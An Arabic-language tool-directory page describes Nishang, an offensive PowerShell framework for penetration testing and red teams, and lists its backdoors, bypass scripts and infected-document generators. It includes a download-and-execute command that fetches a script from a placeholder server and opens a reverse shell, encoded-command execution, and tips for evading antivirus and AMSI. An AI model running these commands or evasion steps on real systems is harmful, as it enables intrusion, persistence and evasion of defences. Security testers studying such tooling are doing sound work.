Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
nishang — Nishang - باور شيل الهجومي لفريق الاختراق الأحمر، اختبار الاختراق والأمن الهجومي. | Kitploit
أدوات/GitHubGitHub/samratashok/nishang
كسر كلمات المرورأدوات التصيدتصعيد الامتيازاتتوليد الحمولةالاستغلالالحركة الجانبيةتسريب البياناتجمع المعلوماتما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمر
10.0k2.5k128منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubsamratashok/nishang

nishang

Nishang - باور شيل الهجومي لفريق الاختراق الأحمر، اختبار الاختراق والأمن الهجومي.

عرض المستودع

نيشانغ

نيشانغ هو إطار عمل ومجموعة من السكريبتات والحمولات التي تتيح استخدام باورشيل للأمن الهجومي واختبار الاختراق وتمارين الفريق الأحمر. نيشانغ مفيد خلال جميع مراحل اختبار الاختراق.

بقلم Nikhil Mittal مؤسس Altered Security - تدريب عملي على الأمن المؤسسي والفريق الأحمر!

الاستخدام

قم باستيراد جميع السكريبتات في جلسة باورشيل الحالية (من إصدار باورشيل v3 فصاعدًا).

PS C:\nishang> Import-Module .\nishang.psm1

استخدم السكريبتات الفردية باستخدام dot sourcing.

PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1

PS C:\nishang> Get-Information

للحصول على المساعدة حول أي سكريبت أو دالة، استخدم:

PS C:\nishang> Get-Help [scriptname] -full

لاحظ أن المساعدة متاحة للدالة التي تم تحميلها بعد تشغيل السكريبت وليس للسكريبت نفسه منذ الإصدار 0.3.8. في جميع الحالات، اسم الدالة هو نفس اسم السكريبت.

على سبيل المثال، لرؤية المساعدة حول Get-WLAN-Keys.ps1، استخدم

PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1

PS C:\nishang> Get-Help Get-WLAN-Keys -Full

مكافحة الفيروسات

يتم الإبلاغ عن سكريبتات نيشانغ من قبل العديد من برامج مكافحة الفيروسات باعتبارها ضارة. السكريبتات على الهدف يُقصد بها أن تُستخدم في الذاكرة وهو أمر سهل جدًا باستخدام باورشيل. طريقتان أساسيتان لتنفيذ سكريبتات باورشيل في الذاكرة:

الطريقة 1. استخدام التحميل والتنفيذ في الذاكرة: استخدم الأمر أدناه لتنفيذ سكريبت باورشيل من شل بعيدة، شل ميتيربريتر الأصلي، شل ويب، إلخ. والدالة التي يصدرها. جميع السكريبتات في نيشانغ تصدر دالة بنفس الاسم في جلسة باورشيل الحالية.

powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

الطريقة 2. استخدام المعامل -encodedcommand (أو -e) الخاص بباورشيل جميع السكريبتات في نيشانغ تصدر دالة بنفس الاسم في جلسة باورشيل الحالية. لذلك، تأكد من استدعاء الدالة في السكريبت نفسه عند استخدام معامل encodedcommand من شل غير باورشيل. للمثال أعلاه، أضف استدعاء دالة (بدون علامات اقتباس) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]".

قم بتشفير السكريبت باستخدام Invoke-Encode من نيشانغ:

PS C:\nishang> . \nishang\Utility\Invoke-Encode

PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand

البيانات المشفرة كُتبت إلى .\encoded.txt

الأمر المشفر كُتب إلى .\encodedcommand.txt

من أعلاه، استخدم السكريبت المشفر من encodedcommand.txt وقم بتشغيله على هدف حيث يمكن تنفيذ الأوامر (شل بعيدة، شل ميتيربريتر الأصلي، شل ويب، إلخ.). استخدمه كما يلي:

C:\Users\target> powershell -e [encodedscript]

إذا استمر اكتشاف السكريبتات، فإن تغيير أسماء الدوال والمعاملات وإزالة محتوى المساعدة سيساعد.

في حال كان AMSI في ويندوز 10 لا يزال يحظر تنفيذ السكريبت، راجع هذه المدونة: http://www.labofapenetrationtester.com/2016/09/amsi.html

السكريبتات

يحتوي نيشانغ حاليًا على السكريبتات والحمولات التالية.

ActiveDirectory

Set-DCShadowPermissions

تعديل كائنات AD لتوفير الحد الأدنى من الأذونات المطلوبة لـ DCShadow.

Antak - شل الويب

Antak

تنفيذ سكريبتات باورشيل في الذاكرة، تشغيل الأوامر، وتحميل ورفع الملفات باستخدام شل الويب هذا.

البوابات الخلفية (Backdoors)

HTTP-Backdoor

باب خلفي يمكنه استقبال التعليمات من مواقع الطرف الثالث وتنفيذ سكريبتات باورشيل في الذاكرة.

DNS_TXT_Pwnage

باب خلفي يمكنه استقبال الأوامر وسكريبتات باورشيل من استعلامات DNS TXT، وتنفيذها على الهدف، والتحكم به عن بُعد باستخدام الاستعلامات.

Execute-OnTime

باب خلفي يمكنه تنفيذ سكريبتات باورشيل في وقت معين على الهدف.

Gupt-Backdoor

باب خلفي يمكنه استقبال الأوامر والسكريبتات من SSID لشبكة WLAN دون الاتصال بها.

Add-ScrnSaveBackdoor

باب خلفي يمكنه استخدام شاشة توقف ويندوز لتنفيذ الأوامر والسكريبتات عن بُعد.

Invoke-ADSBackdoor

باب خلفي يمكنه استخدام تدفقات البيانات البديلة (ADS) وسجل ويندوز لتحقيق الثبات (persistence).

Add-RegBackdoor

باب خلفي يستخدم خدعة Debugger المعروفة لتنفيذ الحمولة مع مفاتيح Sticky keys و Utilman (مفتاح ويندوز + U).

Set-RemoteWMI

تعديل أذونات مساحات أسماء DCOM و WMI للسماح بالوصول لمستخدم غير مسؤول (non-admin).

Set-RemotePSRemoting

تعديل أذونات الباورشيل عن بُعد (PSRemoting) للسماح بالوصول لمستخدم غير مسؤول (non-admin).

Bypass

Invoke-AmsiBypass

تنفيذ للطرق المعروفة علنًا لتجاوز/تجنب AMSI.

Client

Out-CHM

إنشاء ملفات CHM مصابة يمكنها تنفيذ أوامر وسكريبتات باورشيل.

Out-Word

إنشاء ملفات Word وإصابة الملفات الموجودة لتشغيل أوامر وسكريبتات باورشيل.

Out-Excel

إنشاء ملفات Excel وإصابة الملفات الموجودة لتشغيل أوامر وسكريبتات باورشيل.

Out-HTA

إنشاء ملف HTA يمكن نشره على خادم ويب واستخدامه في حملات التصيد.

Out-Java

إنشاء ملفات JAR موقعة يمكن استخدامها مع applets لتنفيذ السكريبتات والأوامر.

Out-Shortcut

إنشاء ملفات اختصار قادرة على تنفيذ أوامر وسكريبتات باورشيل.

Out-WebQuery

إنشاء ملفات IQY لصيد بيانات الاعتماد وتجزئات SMB.

Out-JS

إنشاء ملفات JS قادرة على تنفيذ أوامر وسكريبتات باورشيل.

Out-SCT

إنشاء ملفات SCT قادرة على تنفيذ أوامر وسكريبتات باورشيل.

Out-SCF

إنشاء ملف SCF يمكن استخدامه لالتقاط تحديات تجزئة NTLM.

Escalation

Enable-DuplicateToken

عندما تكون صلاحيات SYSTEM مطلوبة.

Remove-Update

إدخال ثغرات عن طريق إزالة التصحيحات.

Invoke-PsUACme

تجاوز UAC.

Execution

Download-Execute-PS

تنزيل وتنفيذ سكريبت باورشيل في الذاكرة.

Download_Execute

تنزيل ملف تنفيذي بصيغة نصية، تحويله إلى ملف تنفيذي، وتنفيذه.

Execute-Command-MSSQL

تشغيل أوامر باورشيل، أوامر أصلية، أو أوامر SQL على خادم MSSQL بصلاحيات كافية.

Execute-DNSTXT-Code

تنفيذ شيل كود (shellcode) في الذاكرة باستخدام استعلامات DNS TXT.

تنزيل الأداة